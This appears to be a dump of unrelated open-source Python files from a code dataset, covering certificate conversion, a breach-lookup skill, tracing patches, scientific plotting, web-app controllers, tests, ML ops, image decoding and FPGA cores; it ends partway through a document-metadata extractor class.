import re
import sys
class Cert(object):
def __init__(self, name, buff):
self.name = name
self.len = len(buff)
self.buff = buff
pass
def __str__(self):
out_str = ['\0']*32
for i in range(len(self.name)):
out_str[i] = self.name[i]
out_str = "".join(out_str)
out_str += str(chr(self.len & 0xFF))
out_str += str(chr((self.len & 0xFF00) >> 8))
out_str += self.buff
return out_str
def main():
parser = argparse.ArgumentParser(description='Convert PEM file(s) into C source file.')
parser.add_argument('--section',
default='.servercert.flash',
help='specify the section for the data (default is .servercert.flash)')
parser.add_argument('--name',
default='tls_server_cert_area',
help='specify the variable name for the data (default is tls_server_cert_area)')
parser.add_argument('file', nargs='+',
help='One or more PEM files')
args = parser.parse_args()
cert_list = []
cert_file_list = []
for cert_file in args.file:
with open(cert_file, 'r') as f:
buff = f.read()
m = re.search(r"-----BEGIN ([A-Z ]+)-----([^-]+?)-----END \1-----", buff, flags=re.DOTALL)
if not m:
sys.exit("Input file was not in PEM format")
if "----BEGIN" in buff[m.end(0):]:
sys.exit("Input file contains more than one PEM object")
cert_list.append(Cert(m.group(1), base64.b64decode(''.join(m.group(2).split()))))
print '__attribute__((section("%s"))) unsigned char %s[INTERNAL_FLASH_SECTOR_SIZE] = {' % (args.section, args.name)
for _cert in cert_list:
col = 0
for ch in str(_cert):
print ("0x%02x," % ord(ch)),
if col & 15 == 15:
print
col = col + 1
print '\n0xff};\n'
if __name__ == '__main__':
main()
|
src/media/audio/audio_core/schema/make_schema_header.py | allansrc/fuchsia | 210 | 12744822 | #!/usr/bin/env python3.8
# Copyright (c) 2018 Google Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import re
import sys
HEADER = """#include <string>
namespace media::audio {
// This is a char[] type because that requires no code to run
// initialization, so other constants can be initialized with
// this value.
//
// It is constexpr so that it can be used in the initialization
// of other constexprs.
static constexpr char %s[] =
"""
FOOTER = """
} // namespace media::audio
"""
def main():
if len(sys.argv) != 3:
print("Usage: %s <input_file> <output_file>" % (sys.argv[0],))
exit(-1)
lines = open(sys.argv[1], 'r').readlines()
out = open(sys.argv[2], 'w')
varname = re.sub(
'_([a-zA-Z0-9])', lambda m: m.group(1).upper(),
'k_' + os.path.splitext(os.path.split(sys.argv[1])[1])[0])
out.write(HEADER % (varname,))
for i in range(len(lines)):
l = lines[i].replace('\n', '') # Remove the trailing newline
l = re.sub('//.*', '', l) # Remove any comments
l = re.sub('(^\s+|\s+$)', '', l) # Remove leading/trailing whitespace
        l = l.replace('\\', '\\\\') # Escape all backslashes
l = l.replace('"', '\\"') # Escape all double-quotes
# Skip empty lines
if len(l) == 0:
continue
out.write(' "%s"' % (l,))
if ((i + 1) == len(lines)):
out.write(';\n')
else:
out.write('\n')
out.write(FOOTER)
out.close()
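# Illustrative note (added for documentation; not part of the original tool):
# the C++ variable name is derived from the input file name, turning
# snake_case into CamelCase with a leading 'k'. The file name below is
# hypothetical.
def _example_varname(input_path="schema/audio_core_config.json"):
    return re.sub(
        '_([a-zA-Z0-9])', lambda m: m.group(1).upper(),
        'k_' + os.path.splitext(os.path.split(input_path)[1])[0])  # -> "kAudioCoreConfig"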
if __name__ == '__main__':
main()
|
packages/checker/haveibeenpwned.py | madstk1/leon | 9,211 | 12744837 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import utils
from time import sleep
from urllib import parse
from requests import codes, exceptions
# Developer token
apikey = utils.config('api_key')
def run(string, entities):
"""Verify if one or several email addresses have been pwned"""
emails = []
for item in entities:
if item['entity'] == 'email':
emails.append(item['resolution']['value'])
if not emails:
emails = utils.config('emails')
if not emails:
return utils.output('end', 'no-email', utils.translate('no-email'))
utils.output('inter', 'checking', utils.translate('checking'))
for index, email in enumerate(emails):
isLastEmail = index == len(emails) - 1
breached = checkForBreach(email)
data = { 'email': email }
# Have I Been Pwned API returns a 403 when accessed by unauthorized/banned clients
if breached == 403:
return utils.output('end', 'blocked', utils.translate('blocked', { 'website_name': 'Have I Been Pwned' }))
elif breached == 503:
return utils.output('end', 'blocked', utils.translate('unavailable', { 'website_name': 'Have I Been Pwned' }))
elif not breached:
if isLastEmail:
return utils.output('end', 'no-pwnage', utils.translate('no-pwnage', data))
else:
utils.output('inter', 'no-pwnage', utils.translate('no-pwnage', data))
else:
data['result'] = ''
for index, b in enumerate(breached):
data['result'] += utils.translate('list_element', {
'url': 'http://' + b['Domain'],
'name': b['Name'],
'total': b['PwnCount']
}
)
if isLastEmail:
return utils.output('end', 'pwned', utils.translate('pwned', data))
else:
utils.output('inter', 'pwned', utils.translate('pwned', data))
def checkForBreach(email):
    # Delay for 2 seconds before making the request to accommodate the API usage policy
sleep(2)
truncate = '?truncateResponse=true'
url = 'https://haveibeenpwned.com/api/v3/breachedaccount/' + parse.quote_plus(email)
try:
response = utils.http('GET', url, { 'hibp-api-key': apikey })
if response.status_code == 404:
return None
elif response.status_code == 200:
return response.json()
return response.status_code
except exceptions.RequestException as e:
return utils.output('end', 'down', utils.translate('errors', { 'website_name': 'Have I Been Pwned' }))
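# Illustrative sketch (added for documentation; not part of the original Leon
# skill). checkForBreach() goes through Leon's utils.http helper; a direct
# equivalent with the `requests` library would look roughly like the lines
# below. The API key value is a placeholder.
#
#   import requests
#   resp = requests.get(
#       'https://haveibeenpwned.com/api/v3/breachedaccount/' + parse.quote_plus(email),
#       headers={'hibp-api-key': 'YOUR_API_KEY'})
#   breaches = resp.json() if resp.status_code == 200 else None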
|
eventlet/zipkin/greenthread.py | li-caspar/eventlet_0.30.2 | 5,079 | 12744843 | <reponame>li-caspar/eventlet_0.30.2
from eventlet import greenthread
from eventlet.zipkin import api
__original_init__ = greenthread.GreenThread.__init__
__original_main__ = greenthread.GreenThread.main
def _patched__init(self, parent):
# parent thread saves current TraceData from tls to self
if api.is_tracing():
self.trace_data = api.get_trace_data()
__original_init__(self, parent)
def _patched_main(self, function, args, kwargs):
# child thread inherits TraceData
if hasattr(self, 'trace_data'):
api.set_trace_data(self.trace_data)
__original_main__(self, function, args, kwargs)
def patch():
greenthread.GreenThread.__init__ = _patched__init
greenthread.GreenThread.main = _patched_main
def unpatch():
greenthread.GreenThread.__init__ = __original_init__
greenthread.GreenThread.main = __original_main__
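# Illustrative usage sketch (added for documentation; not part of the original
# module). patch()/unpatch() swap GreenThread.__init__ and GreenThread.main so
# that spawned greenthreads inherit the parent's Zipkin trace data:
#
#   from eventlet.zipkin import greenthread as zipkin_greenthread
#   zipkin_greenthread.patch()    # children now inherit trace data
#   ...
#   zipkin_greenthread.unpatch()  # restore the original behaviour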
|
src/python/example/gudhi_graphical_tools_example.py | gtauzin/gudhi-devel | 146 | 12744863 | <filename>src/python/example/gudhi_graphical_tools_example.py
#!/usr/bin/env python
import matplotlib.pyplot as plot
import gudhi
""" This file is part of the Gudhi Library - https://gudhi.inria.fr/ - which is released under MIT.
See file LICENSE or go to https://gudhi.inria.fr/licensing/ for full license details.
Author(s): <NAME>
Copyright (C) 2016 Inria
Modification(s):
- YYYY/MM Author: Description of the modification
"""
__author__ = "<NAME>"
__copyright__ = "Copyright (C) 2016 Inria"
__license__ = "MIT"
print("#####################################################################")
print("Show barcode persistence example")
persistence = [
(2, (1.0, float("inf"))),
(1, (1.4142135623730951, float("inf"))),
(1, (1.4142135623730951, float("inf"))),
(0, (0.0, float("inf"))),
(0, (0.0, 1.0)),
(0, (0.0, 1.0)),
(0, (0.0, 1.0)),
]
gudhi.plot_persistence_barcode(persistence)
plot.show()
print("#####################################################################")
print("Show diagram persistence example")
gudhi.plot_persistence_diagram(persistence)
plot.show()
print("#####################################################################")
print("Show diagram persistence example with a confidence band")
gudhi.plot_persistence_diagram(persistence, band=0.2)
plot.show()
print("#####################################################################")
print("Show barcode and diagram persistence side by side example")
fig, axes = plot.subplots(nrows=1, ncols=2)
gudhi.plot_persistence_barcode(persistence, axes = axes[0])
gudhi.plot_persistence_diagram(persistence, axes = axes[1])
fig.suptitle("barcode versus diagram")
plot.show()
|
webrecorder/webrecorder/appcontroller.py | ssteo/webrecorder | 1,217 | 12744867 | <filename>webrecorder/webrecorder/appcontroller.py
from webrecorder.basecontroller import BaseController
from webrecorder.models.importer import ImportStatusChecker
# ============================================================================
class AppController(BaseController):
def __init__(self, *args, **kwargs):
super(AppController, self).__init__(*args, **kwargs)
config = kwargs['config']
# Auto Import on Init Id
self.init_import_id = config.get('init_import_id')
self.init_import_username = config.get('init_import_user')
self.init_import_coll_name = config.get('init_import_coll')
def init_routes(self):
@self.app.get(['/', '/index.html'])
@self.jinja2_view('index.html', refresh_cookie=False)
def home_page():
self.redir_host()
resp = {'is_home': '1'}
if self.init_import_id:
return self.handle_player_load(resp)
if not self.access.session_user.is_anon():
coll_list = self.access.session_user.get_collections()
resp['collections'] = [coll.serialize() for coll in coll_list]
resp['coll_title'] = ''
resp['rec_title'] = ''
else:
self.fill_anon_info(resp)
return resp
@self.app.get('/_faq')
@self.jinja2_view('faq.html')
def faq():
return {}
@self.app.get('/_documentation')
@self.jinja2_view('howtoguide.html')
def documentation():
return {}
@self.app.get('/_policies')
@self.jinja2_view('policies.html')
def policies():
return {}
# Expiry Message
@self.app.route('/_expire')
def expire():
self.flash_message('Sorry, the anonymous collection has expired due to inactivity')
self.redirect('/')
def handle_player_load(self, resp):
""" Initial warc load for player
"""
user = self.user_manager.all_users[self.init_import_username]
status_checker = ImportStatusChecker(self.redis)
upload_status = status_checker.get_upload_status(user, self.init_import_id)
# if upload already finished, redirect to known coll
if not upload_status or upload_status.get('done'):
if user and self.init_import_coll_name:
self.redirect('/' + user.name + '/' + self.init_import_coll_name)
resp['upload_status'] = upload_status or {}
return resp
|
datashader/tests/benchmarks/test_draw_line.py | goncaloperes/datashader | 706 | 12744887 | from __future__ import division
import sys
import pytest
import numpy as np
from datashader.glyphs import Glyph
from datashader.glyphs.line import _build_draw_segment, \
_build_map_onto_pixel_for_line
from datashader.utils import ngjit
py2_skip = pytest.mark.skipif(sys.version_info.major < 3, reason="py2 not supported")
mapper = ngjit(lambda x: x)
map_onto_pixel = _build_map_onto_pixel_for_line(mapper, mapper)
sx, tx, sy, ty = 1, 0, 1, 0
xmin, xmax, ymin, ymax = 0, 5, 0, 5
@pytest.fixture
def draw_line():
@ngjit
def append(i, x, y, agg):
agg[y, x] += 1
expand_aggs_and_cols = Glyph._expand_aggs_and_cols(append, 1)
return _build_draw_segment(append, map_onto_pixel, expand_aggs_and_cols,
False)
@py2_skip
@pytest.mark.benchmark(group="draw_line")
def test_draw_line_left_border(benchmark, draw_line):
n = 10**4
x0, y0 = (0, 0)
x1, y1 = (0, n)
agg = np.zeros((n+1, n+1), dtype='i4')
benchmark(draw_line, sx, tx, sy, ty, xmin, xmax, ymin, ymax, x0, y0, x1, y1, 0, True, agg)
@py2_skip
@pytest.mark.benchmark(group="draw_line")
def test_draw_line_diagonal(benchmark, draw_line):
n = 10**4
x0, y0 = (0, 0)
x1, y1 = (n, n)
agg = np.zeros((n+1, n+1), dtype='i4')
benchmark(draw_line, sx, tx, sy, ty, xmin, xmax, ymin, ymax, x0, y0, x1, y1, 0, True, agg)
@py2_skip
@pytest.mark.benchmark(group="draw_line")
def test_draw_line_offset(benchmark, draw_line):
n = 10**4
x0, y0 = (0, n//4)
x1, y1 = (n, n//4-1)
agg = np.zeros((n+1, n+1), dtype='i4')
benchmark(draw_line, sx, tx, sy, ty, xmin, xmax, ymin, ymax, x0, y0, x1, y1, 0, True, agg)
|
data/models/base.py | pombredanne/vulncode-db | 592 | 12744891 | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from itertools import zip_longest
from typing import Dict, Tuple, Any, Union, Optional, List
from flask_marshmallow import Marshmallow # type: ignore
from flask_sqlalchemy import DefaultMeta # type: ignore
from flask_sqlalchemy import SQLAlchemy as SQLAlchemyBase
from sqlalchemy import Index, Column, Integer, func, DateTime, inspect
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy.orm import Mapper, RelationshipProperty
from sqlalchemy.orm.attributes import History
from sqlalchemy.orm.interfaces import MapperProperty
from sqlalchemy.orm.state import InstanceState, AttributeState
log = logging.getLogger(__name__)
# Adding the "pool_pre_ping" command to avoid mysql server has gone away issues.
# Note: This will slightly degrade performance. It might be better to adjust
# MariaDB server settings.
class SQLAlchemy(SQLAlchemyBase):
def apply_pool_defaults(self, app, options):
options = super().apply_pool_defaults(app, options)
options["pool_pre_ping"] = True
return options
db = SQLAlchemy()
ma = Marshmallow() # pylint: disable=invalid-name
BaseModel: DefaultMeta = db.Model
ChangeUnion = Union[Tuple[Any, Any], Dict[str, Any], List[Any]]
Changes = Dict[str, ChangeUnion]
class MainBase(BaseModel):
# N.B. We leave the schema out on purpose as alembic gets confused
# otherwise. The default schema is already main (as specified in the
# connection string). Also see:
# https://github.com/sqlalchemy/alembic/issues/519#issuecomment-442533633
# __table_args__ = {'schema': 'main'}
__abstract__ = True
id = Column(Integer, autoincrement=True, primary_key=True)
date_created = Column(DateTime, default=func.current_timestamp())
date_modified = Column(
DateTime,
default=func.current_timestamp(),
onupdate=func.current_timestamp(),
)
def model_changes(self, *, already_tested=None) -> Changes:
"""Returns the changed attributes of this instance.
Returns:
a dictionary mapping the attributes to (new, old) tuples or a
recursive version if the attribute is a list or reference.
"""
def inner(current) -> Optional[Union[List[Any], Changes]]:
if isinstance(current, list):
res = [inner(item) for item in current]
if any(res):
return res
elif hasattr(current, "model_changes"):
return current.model_changes(already_tested=already_tested)
return None
changes: Changes = {}
if already_tested is None:
already_tested = {id(self)}
elif id(self) in already_tested:
return changes
already_tested.add(id(self))
state: InstanceState = inspect(self)
attr: AttributeState
for name, attr in state.attrs.items():
hist: History = attr.load_history()
if hist.has_changes():
changes[name] = hist[0], hist[2]
else:
subchanges = inner(getattr(self, name))
if subchanges:
changes[name] = subchanges
return changes
def diff(self, other: BaseModel, *, already_tested=None) -> Changes:
"""Returns the difference between this instance and the given one.
Returns:
a dictionary mapping the attributes to (new, old) tuples or a
recursive version if the attribute is a list or reference.
"""
changes: Changes = {}
if already_tested is None:
already_tested = {id(self), id(other)}
elif id(self) in already_tested and id(other) in already_tested:
return changes
already_tested.add(id(self))
already_tested.add(id(other))
if id(self) == id(other): # identity cache
log.warning("Comparing the same instance (%r). Identity cache?", self)
return self.model_changes()
clz = type(self)
oclz = type(other)
if not isinstance(other, clz):
raise TypeError(
"Instance of {} expected. Got {}".format(clz.__name__, oclz.__name__)
)
def innerdiff(current, other) -> Optional[ChangeUnion]:
if current is None and other is None:
return None
if current is None or other is None:
return (current, other)
if hasattr(current, "diff"):
return current.diff(other, already_tested=already_tested)
if isinstance(current, list) and isinstance(other, list):
res = []
for cur, oth in zip_longest(current, other):
res.append(innerdiff(cur, oth))
if all(res):
return res
elif current != other:
return (current, other)
return None
mapper: Mapper = inspect(clz)
name: str
attr: MapperProperty
for name, attr in mapper.attrs.items(): # type: ignore
# log.debug('Compare %s of %s <> %s', name, clz, oclz)
other_value = getattr(other, name)
current_value = getattr(self, name)
if isinstance(attr, RelationshipProperty) and other_value is None:
for col in attr.local_columns:
cname = col.name
if innerdiff(getattr(self, cname), getattr(other, cname)):
break
else:
continue
if name in changes:
continue
subchanges = innerdiff(current_value, other_value)
if subchanges:
changes[name] = subchanges
return changes
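# Illustrative sketch (added for documentation; not part of the original
# code). model_changes() reports (new, old) pairs for attributes modified on a
# pending instance, while diff() compares two instances of the same model. The
# model and attribute names below are hypothetical:
#
#   vuln = db.session.query(SomeModel).get(1)
#   vuln.comment = "updated text"
#   vuln.model_changes()   # -> {'comment': ('updated text', 'old text')}
#   vuln.diff(db.session.query(SomeModel).get(2))   # -> nested dict of differences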
class NvdBase(BaseModel):
__abstract__ = True
@declared_attr
def __table_args__(cls): # pylint: disable=no-self-argument
indices = []
idx_format = "idx_{tbl_name}_{col_name}"
for key in cls.__dict__:
attribute = cls.__dict__[key]
# pylint: disable=no-member
if not isinstance(attribute, db.Column) or not attribute.index:
continue
# pylint: enable=no-member
# Disable Index
attribute.index = None
# Create a custom index here.
indices.append(
Index(idx_format.format(tbl_name=cls.__tablename__, col_name=key), key)
)
indices.append({"schema": "cve"})
return tuple(indices)
class CweBase(BaseModel):
__table_args__ = {"schema": "cwe"}
__abstract__ = True
|
tests/test_chi_land_trust.py | MAYANK25402/city-scrapers | 255 | 12744914 | from datetime import datetime
from operator import itemgetter
from os.path import dirname, join
import pytest # noqa
from city_scrapers_core.constants import BOARD, PASSED
from city_scrapers_core.utils import file_response
from freezegun import freeze_time
from city_scrapers.spiders.chi_land_trust import ChiLandTrustSpider
test_response = file_response(
join(dirname(__file__), "files", "chi_land_trust.html"),
url="https://www.chicago.gov/city/en/depts/doh/supp_info/chicago_communitylandtrust0.html", # noqa
)
spider = ChiLandTrustSpider()
freezer = freeze_time("2019-07-11")
freezer.start()
parsed_items = sorted(
[item for item in spider.parse(test_response)], key=itemgetter("start")
)
freezer.stop()
def test_count():
assert len(parsed_items) == 13
def test_title():
assert parsed_items[-6]["title"] == "Board of Directors"
def test_description():
assert parsed_items[-6]["description"] == ""
def test_start():
assert parsed_items[-6]["start"] == datetime(2019, 2, 7, 9, 0)
def test_end():
assert parsed_items[-6]["end"] is None
def test_time_notes():
assert parsed_items[-6]["time_notes"] == "See agenda to confirm time"
def test_id():
assert parsed_items[-6]["id"] == "chi_land_trust/201902070900/x/board_of_directors"
def test_status():
assert parsed_items[-6]["status"] == PASSED
def test_location():
assert parsed_items[-6]["location"] == spider.location
def test_source():
assert (
parsed_items[-6]["source"]
== "https://www.chicago.gov/city/en/depts/doh/supp_info/chicago_communitylandtrust0.html" # noqa
)
def test_links():
assert parsed_items[-6]["links"] == [
{
"href": "https://www.chicago.gov/content/dam/city/depts/doh/general/CCLT_February_2019_Agernda.pdf", # noqa
"title": "Agenda",
}
]
def test_classification():
assert parsed_items[-6]["classification"] == BOARD
def test_all_day():
assert parsed_items[-6]["all_day"] is False
|
ops.py | Gengarrr/Relation-Network-Tensorflow | 267 | 12744940 | import tensorflow as tf
import tensorflow.contrib.slim as slim
def lrelu(x, leak=0.2, name="lrelu"):
with tf.variable_scope(name):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
def selu(x):
alpha = 1.6732632423543772848170429916717
scale = 1.0507009873554804934193349852946
return scale * tf.where(x > 0.0, x, alpha * tf.exp(x) - alpha)
def huber_loss(labels, predictions, delta=1.0):
residual = tf.abs(predictions - labels)
condition = tf.less(residual, delta)
small_res = 0.5 * tf.square(residual)
large_res = delta * residual - 0.5 * tf.square(delta)
return tf.where(condition, small_res, large_res)
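# Illustrative sketch (added for documentation; not part of the original
# file). huber_loss() above is the standard piecewise form: quadratic for
# small residuals, linear beyond `delta`. The same formula restated with
# NumPy (numpy is not imported by the original module):
def _huber_loss_numpy(labels, predictions, delta=1.0):
    import numpy as np
    residual = np.abs(predictions - labels)
    small_res = 0.5 * np.square(residual)
    large_res = delta * residual - 0.5 * np.square(delta)
    return np.where(residual < delta, small_res, large_res)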
def conv2d(input, output_shape, is_train, activation_fn=tf.nn.relu,
k_h=5, k_w=5, s_h=2, s_w=2, stddev=0.02, name="conv2d"):
with tf.variable_scope(name):
w = tf.get_variable('w', [k_h, k_w, input.get_shape()[-1], output_shape],
initializer=tf.truncated_normal_initializer(stddev=stddev))
conv = tf.nn.conv2d(input, w, strides=[1, s_h, s_w, 1], padding='SAME')
biases = tf.get_variable('biases', [output_shape],
initializer=tf.constant_initializer(0.0))
activation = activation_fn(conv + biases)
bn = tf.contrib.layers.batch_norm(activation, center=True, scale=True,
decay=0.9, is_training=is_train,
updates_collections=None)
return bn
def fc(input, output_shape, activation_fn=tf.nn.relu, name="fc"):
output = slim.fully_connected(input, int(output_shape), activation_fn=activation_fn)
return output
|
common/slow.py | spao234/wpt | 575 | 12744948 | <filename>common/slow.py
import time
def main(request, response):
time.sleep(2)
return 200, [], b''
|
VSR/DataLoader/YVDecoder.py | Kadantte/VideoSuperResolution | 1,447 | 12744959 | <reponame>Kadantte/VideoSuperResolution
# Copyright (c) 2017-2020 <NAME>.
# Author: <NAME>
# Email: <EMAIL>
# Update: 2020 - 2 - 7
# Image customized decoder for YV12([Y][U/4][V/4]), YV21([Y][V/4][U/4])
# NOTE: [Y][U][V] means Y/U/V channel is a planar channel, [U/4] means
# U channel is sub-sampled by a factor of [2, 2]
import numpy as np
from PIL import ImageFile
class YV12Decoder(ImageFile.PyDecoder):
"""PIL.Image.DECODERS for YV12 format raw bytes
Registered in `Image.DECODERS`, don't use this class directly!
"""
def __init__(self, mode, *args):
super(YV12Decoder, self).__init__(mode, *args)
def decode(self, buffer):
if self.mode == 'L':
# discard UV channel
self.set_as_raw(buffer, 'L')
else:
w, h = self.im.size
y = np.frombuffer(buffer, 'uint8', count=w * h)
u = np.frombuffer(buffer, 'uint8', count=w * h // 4, offset=w * h)
v = np.frombuffer(
buffer, 'uint8', count=w * h // 4, offset=w * h + w * h // 4)
y = np.reshape(y, [h, w])
u = np.reshape(u, [h // 2, w // 2])
v = np.reshape(v, [h // 2, w // 2])
u = u[np.arange(h) // 2][:, np.arange(w) // 2]
v = v[np.arange(h) // 2][:, np.arange(w) // 2]
yuv = np.stack([y, u, v], axis=-1)
self.set_as_raw(yuv.flatten().tobytes())
return -1, 0
class YV21Decoder(ImageFile.PyDecoder):
"""PIL.Image.DECODERS for YV21 format raw bytes
Registered in `Image.DECODERS`, don't use this class directly!
"""
def __init__(self, mode, *args):
super(YV21Decoder, self).__init__(mode, *args)
def decode(self, buffer):
if self.mode == 'L':
# discard UV channel
self.set_as_raw(buffer, 'L')
else:
w, h = self.im.size
y = np.frombuffer(buffer, 'uint8', count=w * h)
v = np.frombuffer(buffer, 'uint8', count=w * h // 4, offset=w * h)
u = np.frombuffer(
buffer, 'uint8', count=w * h // 4, offset=w * h + w * h // 4)
y = np.reshape(y, [h, w])
u = np.reshape(u, [h // 2, w // 2])
v = np.reshape(v, [h // 2, w // 2])
u = u[np.arange(h) // 2][:, np.arange(w) // 2]
v = v[np.arange(h) // 2][:, np.arange(w) // 2]
yuv = np.stack([y, u, v], axis=-1)
self.set_as_raw(yuv.flatten().tobytes())
return -1, 0
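# Illustrative note (added for documentation; not part of the original VSR
# module). A YV12/YV21 frame of size (w, h) packs w*h luma bytes followed by
# two w*h/4 chroma planes (w*h*3/2 bytes in total); the decoders above
# upsample the chroma planes back to full resolution by index repetition.
# A standalone restatement of that unpacking for YV12 (assuming even w and h):
def _yv12_to_yuv444(buffer, w, h):
    y = np.frombuffer(buffer, 'uint8', count=w * h).reshape(h, w)
    u = np.frombuffer(buffer, 'uint8', count=w * h // 4, offset=w * h).reshape(h // 2, w // 2)
    v = np.frombuffer(buffer, 'uint8', count=w * h // 4, offset=w * h + w * h // 4).reshape(h // 2, w // 2)
    u = u[np.arange(h) // 2][:, np.arange(w) // 2]
    v = v[np.arange(h) // 2][:, np.arange(w) // 2]
    return np.stack([y, u, v], axis=-1)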
|
litex/soc/cores/dna.py | osterwood/litex | 1,501 | 12744988 | <filename>litex/soc/cores/dna.py
#
# This file is part of LiteX.
#
# Copyright (c) 2014-2015 <NAME> <<EMAIL>>
# SPDX-License-Identifier: BSD-2-Clause
from migen import *
from litex.soc.interconnect.csr import *
# Xilinx DNA (Device Identifier) -------------------------------------------------------------------
class DNA(Module, AutoCSR):
def __init__(self):
n = 57
self._id = CSRStatus(n)
# # #
self.do = do = Signal()
self.count = count = Signal(max=2*n + 1)
self.clk = clk = Signal()
self.comb += clk.eq(count[0])
self.specials += Instance("DNA_PORT",
i_DIN = self._id.status[-1],
o_DOUT = do,
i_CLK = clk,
i_READ = count < 2,
i_SHIFT = 1
)
self.sync += [
If(count < 2*n,
count.eq(count + 1),
If(clk,
self._id.status.eq(Cat(do, self._id.status))
)
)
]
def add_timing_constraints(self, platform, sys_clk_freq, sys_clk):
platform.add_period_constraint(self.clk, 2*1e9/sys_clk_freq)
platform.add_false_path_constraints(self.clk, sys_clk)
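# Illustrative usage sketch (added for documentation; not part of the original
# LiteX file). In a target SoC the core is typically attached as a submodule
# so the 57-bit identifier becomes readable through its CSR; the attribute and
# clock names below are indicative only and depend on the design:
#
#   self.submodules.dna = DNA()
#   self.dna.add_timing_constraints(platform, sys_clk_freq, self.crg.cd_sys.clk)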
|
train_oneside.py | SachinKumar105/Implicit-Competitive-Regularization | 107 | 12744991 | import os
import csv
import time
import math
import pandas as pd
import torch
import torch.nn as nn
import torchvision.utils as vutils
from torch.optim.sgd import SGD
from torch.utils.data import DataLoader
from optims import OCGD, BCGD2
from train_utils import get_data, weights_init_d, weights_init_g, \
get_diff, save_checkpoint, lr_scheduler, generate_data, icrScheduler, get_model
from losses import get_loss
# seed = torch.randint(0, 1000000, (1,))
seed = 2020
torch.manual_seed(seed=seed)
print('random seed : %d' % seed)
def train_ocgd(epoch_num=10, optim_type='BCGD2',
startPoint=None, logdir='test',
update_min=True,
z_dim=128, batchsize=64,
loss_name='WGAN', model_name='dc',
data_path='None', dataname='cifar10',
device='cpu', gpu_num=1, collect_info=False):
lr_d = 0.01
lr_g = 0.01
dataset = get_data(dataname=dataname, path='../datas/%s' % data_path)
dataloader = DataLoader(dataset=dataset, batch_size=batchsize, shuffle=True,
num_workers=4)
D, G = get_model(model_name=model_name, z_dim=z_dim)
D.to(device)
G.to(device)
if startPoint is not None:
chk = torch.load(startPoint)
D.load_state_dict(chk['D'])
G.load_state_dict(chk['G'])
print('Start from %s' % startPoint)
optimizer = OCGD(max_params=G.parameters(), min_params=D.parameters(),
udpate_min=update_min, device=device)
loss_list = []
count = 0
for e in range(epoch_num):
for real_x in dataloader:
real_x = real_x[0].to(device)
d_real = D(real_x)
z = torch.randn((real_x.shape[0], z_dim), device=device)
fake_x = G(z)
d_fake = D(fake_x)
D_loss = get_loss(name=loss_name, g_loss=False, d_real=d_real, d_fake=d_fake)
optimizer.zero_grad()
optimizer.step(loss=D_loss)
if count % 100 == 0:
print('Iter %d, Loss: %.5f' % (count, D_loss.item()))
loss_list.append(D_loss.item())
count += 1
print('epoch{%d/%d}' %(e, epoch_num))
name = 'overtrainD.pth' if update_min else 'overtrainG.pth'
save_checkpoint(path=logdir, name=name, D=D, G=G)
loss_data = pd.DataFrame(loss_list)
loss_data.to_csv('logs/train_oneside.csv')
if __name__ == '__main__':
torch.backends.cudnn.benchmark = True
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
print(device)
chk = 'checkpoints/0.00000MNIST-0.0100/SGD-0.01000_9000.pth'
train_ocgd(epoch_num=10, startPoint=chk,
z_dim=96, update_min=True,
data_path='mnist', dataname='MNIST',
loss_name='JSD', model_name='mnist',
batchsize=128, device=device) |
tests/integration_tests/util.py | trailofbits/mcsema | 1,301 | 12744996 | # Copyright (c) 2020 Trail of Bits, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
def strip_whole_config(filename):
if not filename.endswith(".config"):
return ""
    # str.rstrip() strips a *set* of characters, not a suffix, so a name such as
    # "gcc.config" would lose its trailing "c"/"g"; slice the suffix off instead.
    filename = filename[:-len(".config")]
basename, ext = os.path.splitext(filename)
return basename
def get_binaries(directory):
result = set()
for f in os.listdir(directory):
filename = strip_whole_config(f)
if filename:
result.add(filename)
return result
def get_tags(config):
with open(config, 'r') as f:
line = f.readline().rstrip('\n')
tokens = line.split(' ')
if tokens[0] != 'TAGS:':
return []
return tokens[1:]
def get_bin2tags(directory):
result = {}
for f in os.listdir(directory):
filename = strip_whole_config(f)
if not filename:
continue
tags = get_tags(os.path.join(directory, f))
if filename not in result:
result[filename] = tags
else:
result[filename].append(tags)
return result
def get_cfg(directory, name):
return os.path.join(directory, name + '.cfg')
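# --- Usage sketch (added for illustration; not part of the original module) ---
# Minimal example of walking a directory of "<name>.config" files; the default
# directory is an assumption for illustration only.
if __name__ == "__main__":
    import pprint
    import sys

    cfg_dir = sys.argv[1] if len(sys.argv) > 1 else "."
    print("binaries:", sorted(get_binaries(cfg_dir)))
    pprint.pprint(get_bin2tags(cfg_dir))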
|
.modules/.metagoofil/extractors/metadataOpenOffice.py | termux-one/EasY_HaCk | 1,103 | 12744998 | import unzip
import zipfile
import sys
import re
import os
import random
class metaInfoOO:
def __init__(self):
self.version =""
self.generator=""
self.creationDate=""
self.date=""
self.language=""
self.editingCycles=""
self.editingDuration=""
self.tableCount=""
self.imageCount=""
self.objectCount=""
self.pageCount=""
self.paragraphCount=""
self.wordCount=""
self.characterCount=""
self.initialCreator=""
self.creator=""
self.title=""
self.description=""
self.subject=""
self.printedBy=""
self.printDate=""
def __init__(self,filepath):
self.version =""
self.generator=""
self.creationDate=""
self.date=""
self.language=""
self.editingCycles=""
self.editingDuration=""
